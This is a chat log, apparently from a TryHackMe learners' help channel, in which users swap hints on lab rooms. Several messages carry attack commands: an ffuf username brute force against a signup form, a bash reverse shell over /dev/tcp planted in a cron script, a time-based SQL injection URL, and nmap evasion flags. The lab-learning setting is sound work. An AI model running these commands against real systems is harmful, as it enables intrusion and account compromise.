thanks again. i got it working. command looked right, but somehow it attacked IP/PORT instead of IP:PORT

Gave +1 Rep to @steel nymph

I was able to get the root file from another exploit 👀 . However, I have tried different privesc methods to get missy.

That is the method I got the root one from. i'll take a look and see if there is another one I can manipulate to get to her account

No. I was able to use that particular exploit method to get sudo reads on files. So, I was able to guess the path to the flag and extract what was contained. Not logged into root

Can I quickly DM. I'm trying to not give much away here

This is the command i use

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "admin=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

@modest arch

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

this is the correct one @pearl compass

help needed in net sec challenge ftp

and also the last challenge

do I need to be in a certain directory for it to work? @modest arch

tried many scans but haven't yet found the ftp port

also didn't understand that last challenge

I tried to but it was taking A LOT of time

I'll try again

what exactly is supposed to happen in this one?

let's say I'm able to do that
what then?
does the page just gives me the flag?

okay

nah just make sure the wordlist path is correct

thank you, much appreciated @modest arch

Gave +1 Rep to @smoky oyster

oh not again

anyone help me with this please I wanna sleep😭

You don't have to complete it

and this is the only question m left with in this room

Go sleep

i won't be able to

so help me ?🥺

m not getting any relevant things to get the flag

yeah and then they give an input which I used as you can clearly see in the screenshot

Hint: There are two tables.

i need help with netsec challenge, IDS evasion

task 2

i have 50%

yep

||nmap -sS -F --reason MACHINE_IP||

try -sW, -sX, -sM, -f and --mut 8 but not working

just do the same way as task 7

can I dm @steel nymph ? Stuck on task 8 SQLi

Hey guys. Task 5 windows privesc, sc start dllsvc does not start it. What am I missing

hey there

guys, with each room I have info "Tickets for this room already awarded."

what to do?

how do I get back previous tickets?

Privesc Task 9 crontab. Unable to get revshell 😦 this sucks

depends on what room r u talking about

I said I would help. You never sent me a screenshot lol

File Inclusion, IDOR and Auth bypass

wait wht! u said me to send a ss?

@steel nymph in the last challenge it's showing me 22%
what to do now?

Well I said lemme see it. Guess I wasn't clear sorry

i'm sorry if i didn't see. I'm having a really bad connection rn

damn! and i thought you were lookin upto something lol

wait sending

Ok

It gives start pending on SC start and never actually starts

Reset the box

@steel nymph can i dm you?

You're using the backup.sh file right? Send me a screenshot of what what wrote in the file

i tried many revshell cmd

for ex : sh -i >& /dev/tcp/10.2.97.169/4444 0>&1

Send me a screenshot of whatever you ha e in there now

u mean the backup.sh right?

oh

okay

yeah did

hope it works

Same result. Start pending

damn! i got the root shell!

So what's the moral?

Actually the command ran. I logged as jack but service still pending

yeah! what should someone learn from this room. I mean its not usual to not get the revshell

yeah! this is a lesson for me

haha

Hey having trouble with manual discovery - robots.txt, going to the ip/robots.txt doesn't take me anywhere, just site can't be reached.

Attackbox, got it now. Had to restart attackbox

SQL inection task 8, going to lose my mind, this is my syntax, what am i doing wrong https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--

@modest arch the next qn asks for Matt's passwd. What wordlist should i use to crack the hash?

rockyou isn't working

yeah i did

now i unshadowed

what's next

which wordlist to use?

u get 5 sec?

umm okay! lemme try again

showing 15

yes it worked

try putting u before %

lol i was giving the wrong directory

now i'm getting 5

then keep working on it

damn! hahaha ! i need to make a revision lol

username?

u can check and if its right, keep going on.

ok i have that, now what should i do next

now find other columns

Task 8: https://tryhackme.com/room/xssgi

nc not catching anything.
The listener THM offered only caught a DNS request and nothing else.

Filtering through other people's posts, this doesn't seem to be resolved yet

I couldn't get nc to work either, the THM listener worked finally after I just reset the machine and tried again

it should catch http too

after you get to thm catcher website, follow instructions and make ur own ticket with this payload, it should work

Thanks. Apparently closing the site and closing tun0 wasn't enough. Had to close the browser and start a new session to make it work.

Gave +1 Rep to @opal stirrup

On Task 7 on passive Recon, you're supposed to lookup the 3rd most common port used for ngnix, but when I enter the port number.. I get wrong answer